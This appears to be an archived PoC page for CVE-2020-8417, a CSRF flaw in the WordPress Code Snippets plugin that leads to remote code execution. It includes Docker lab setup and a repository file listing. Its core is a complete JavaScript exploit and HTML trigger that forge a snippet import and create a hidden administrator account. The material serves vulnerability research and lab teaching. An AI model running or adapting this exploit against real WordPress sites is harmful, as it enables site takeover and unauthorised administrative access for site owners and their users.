Associated Vulnerability
Title:WordPress Code Snippets 跨站请求伪造漏洞 (CVE-2020-8417)Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress Code Snippets 2.14.0之前版本中存在跨站请求伪造漏洞,该漏洞源于程序没有正确验证用户输入。远程攻击者可借助格式错误的HTTP请求利用该漏洞在易受攻击网站上注入可执行代码。
Description
Docker repository with a PoC for WP Code Snippets 2.13.3 (CVE-2020-8417)
Readme
# WP Code Snippets Vulnerability (CVE-2020-8417)
This is a Docker PoC for the Code Snippets Vulnerability for security researchers. This repository also contains a walkthrough of how to exploit this vulnerability. Over 200K wordpress websites were vulnerable to this exploit at the time of discovery.
#### WP Code Snippets
[https://wordpress.org/plugins/code-snippets/#developers](https://wordpress.org/plugins/code-snippets/#developers)
## Disclaimer
This code is vulnerable and should not be ran in production or exposed through a DMZ/firewall.
# CVE-2020-8417
The Code Snippets plugin before 2.14.0 has a high-severity Cross-Site Request Forgery (CSRF) vulnerability that when attacked leads to remote code execution (RCE) and complete site takeover.
[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8417](https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417)
[https://nvd.nist.gov/vuln/detail/CVE-2020-8417](https://nvd.nist.gov/vuln/detail/CVE-2020-8417)
[https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417](https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417)
[https://wpvulndb.com/vulnerabilities/10050](https://wpvulndb.com/vulnerabilities/10050)
# Getting Started
You will need to clone the repository locally and then use docker to run the mysql and wordpress images. Everything is here that you need to get started.
### Clone the repository
```git clone git@github.com:VulnCrate/WP-CodeSnippets-CVE-2020-8417.git```
### Docker
cd into the root directory of the repository, pull the images first and then run the Docker Compose "up" command.
```docker-compose pull```
```docker-compose up```
### WordPress Website
You can access and view the WordPress website on your localhost address. Comments to not have to be enabled for this to work.
[http://localhost:8000](http://localhost:8000)
### If you mess up...
Starting over is really easy... run the docker commands below to remove your containers and then run git clean to remove all of the files that were pulled down.
```docker rm -f vc_wp_codesnippets_db```
```docker rm -f vc_wp_codesnippets```
```git clean -xdf```
# Walkthrough
The vulnerability in WP Code Snippets allows anyone to use JavaScript to create injectable code into the site through a Cross-Site Request Forgery (CSRF) that ultimately leads to Remote Code Execution (RCE).
#### Video Walkthrough
[](https://www.youtube.com/watch?v=FoKhZGpXnvI)
## PoC
Chloe Chamberland
https://twitter.com/infosecchloe
[https://wpvulndb.com/vulnerabilities/10050](https://wpvulndb.com/vulnerabilities/10050)
There's an exploit.html file included in the repository but essentially it's going to make a cross-site request that imports a Code Snippet that hooks into the init function that will create an administrative user.
#### `JavaScript`
```javascript
function submitRequest()
{
// change this if you use tihs any where else other than localhost.
var ip = "localhost";
var maliciousCode = "add_action( 'init', function () {" +
"$username = 'hacker';" +
"$password = 'pa$$word';" +
"$email_address = 'hacker@vulncrate.com';" +
"if ( ! username_exists( $username ) ) {" +
"$user_id = wp_create_user( $username, $password, $email_address );" +
"$user = new WP_User( $user_id );" +
"$user->set_role( 'administrator' );" +
"};" +
"} ); ?>";
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/" + ip + ":8000\/wp-admin\/admin.php?page=import-snippets", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"duplicate_action\"\r\n" +
"\r\n" +
"ignore\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" +
"Content-Type: application/json\r\n" +
"\r\n" +
"{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-04-18 12:35\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"" + maliciousCode + "\",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"save\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"max_file_size\"\r\n" +
"\r\n" +
"2097152\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload files and import\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
```
#### `HTML`
```html
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
```
File Snapshot
[4.0K] /data/pocs/9eb085b28490e1ab092bb1be73d4686cf4e655d8
├── [4.0K] db
│ └── [4.0K] dump
│ └── [631K] vc_wp_codesnippets.sql
├── [ 971] docker-compose.yaml
├── [3.2K] exploit.html
├── [ 34K] LICENSE
├── [5.3K] README.md
├── [4.0K] wp
│ └── [4.0K] wp-content
│ └── [4.0K] plugins
│ └── [4.0K] code-snippets
│ ├── [ 23K] CHANGELOG.md
│ ├── [2.6K] code-snippets.php
│ ├── [ 738] composer.json
│ ├── [7.9K] composer.lock
│ ├── [4.0K] css
│ │ ├── [2.0K] editor.scss
│ │ ├── [2.1K] edit.scss
│ │ ├── [4.0K] font
│ │ │ ├── [1.4K] code-snippets.eot
│ │ │ ├── [1.5K] code-snippets.svg
│ │ │ ├── [1.3K] code-snippets.ttf
│ │ │ └── [1.3K] code-snippets.woff
│ │ ├── [ 155] front-end.scss
│ │ ├── [3.4K] manage.scss
│ │ ├── [ 554] menu-icon.scss
│ │ └── [ 78] settings.scss
│ ├── [5.1K] gulpfile.babel.js
│ ├── [4.0K] js
│ │ ├── [ 663] edit.js
│ │ ├── [ 339] editor.js
│ │ ├── [ 428] edit-tags.js
│ │ ├── [ 30] front-end.js
│ │ ├── [3.4K] manage.js
│ │ ├── [2.9K] php-lint.js
│ │ └── [1.6K] settings.js
│ ├── [4.0K] languages
│ │ ├── [ 28K] code-snippets-bel.mo
│ │ ├── [ 36K] code-snippets-bel.po
│ │ ├── [ 23K] code-snippets-de_DE.mo
│ │ ├── [ 41K] code-snippets-de_DE.po
│ │ ├── [ 23K] code-snippets-fr_CA.mo
│ │ ├── [ 38K] code-snippets-fr_CA.po
│ │ ├── [ 24K] code-snippets-fr_FR.mo
│ │ ├── [ 36K] code-snippets-fr_FR.po
│ │ ├── [ 21K] code-snippets-id_ID.mo
│ │ ├── [ 30K] code-snippets-id_ID.po
│ │ ├── [ 18K] code-snippets-it_IT.mo
│ │ ├── [ 31K] code-snippets-it_IT.po
│ │ ├── [ 16K] code-snippets-ja_JP.mo
│ │ ├── [ 21K] code-snippets-ja_JP.po
│ │ ├── [ 22K] code-snippets-nl_NL.mo
│ │ ├── [ 30K] code-snippets-nl_NL.po
│ │ ├── [ 25K] code-snippets.pot
│ │ ├── [ 21K] code-snippets-pt_BR.mo
│ │ ├── [ 30K] code-snippets-pt_BR.po
│ │ ├── [ 26K] code-snippets-ru_RU.mo
│ │ ├── [ 35K] code-snippets-ru_RU.po
│ │ ├── [ 14K] code-snippets-sk_SK.mo
│ │ ├── [ 20K] code-snippets-sk_SK.po
│ │ ├── [ 14K] code-snippets-sr_RS.mo
│ │ ├── [ 19K] code-snippets-sr_RS.po
│ │ ├── [ 11K] code-snippets-zh_CN.mo
│ │ └── [ 16K] code-snippets-zh_CN.po
│ ├── [1.0K] license.txt
│ ├── [1.7K] MENTIONS.md
│ ├── [2.1K] package.json
│ ├── [516K] package-lock.json
│ ├── [4.0K] php
│ │ ├── [4.0K] admin-menus
│ │ │ ├── [3.1K] class-admin-menu.php
│ │ │ ├── [ 20K] class-edit-menu.php
│ │ │ ├── [3.8K] class-import-menu.php
│ │ │ ├── [6.6K] class-manage-menu.php
│ │ │ └── [4.0K] class-settings-menu.php
│ │ ├── [5.6K] class-admin.php
│ │ ├── [6.9K] class-code-snippets.php
│ │ ├── [6.8K] class-contextual-help.php
│ │ ├── [4.2K] class-db.php
│ │ ├── [ 31K] class-list-table.php
│ │ ├── [1.3K] class-shortcode.php
│ │ ├── [8.5K] class-snippet.php
│ │ ├── [5.6K] class-upgrade.php
│ │ ├── [3.3K] editor.php
│ │ ├── [2.0K] functions.php
│ │ ├── [7.4K] import-export.php
│ │ ├── [4.0K] settings
│ │ │ ├── [2.4K] editor-preview.php
│ │ │ ├── [1.7K] render-fields.php
│ │ │ ├── [5.4K] settings-fields.php
│ │ │ └── [5.4K] settings.php
│ │ ├── [ 13K] snippet-ops.php
│ │ └── [4.0K] views
│ │ ├── [7.0K] edit.php
│ │ ├── [3.5K] import.php
│ │ └── [1.5K] manage.php
│ ├── [2.7K] phpcs.xml
│ ├── [ 388] phpunit.xml
│ ├── [3.0K] README.md
│ ├── [ 33K] readme.txt
│ ├── [4.0K] screenshots
│ │ ├── [ 34K] banner-772x250.png
│ │ ├── [373K] screenshot-1.png
│ │ ├── [137K] screenshot-2.png
│ │ ├── [206K] screenshot-3.png
│ │ └── [211K] screenshot-4.png
│ ├── [4.0K] tests
│ │ ├── [ 260] bootstrap.php
│ │ ├── [2.1K] install.sh
│ │ └── [ 173] test-unit-tests.php
│ └── [1.7K] uninstall.php
└── [177K] wp-code-snippets-2020-8417.jpg
16 directories, 96 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.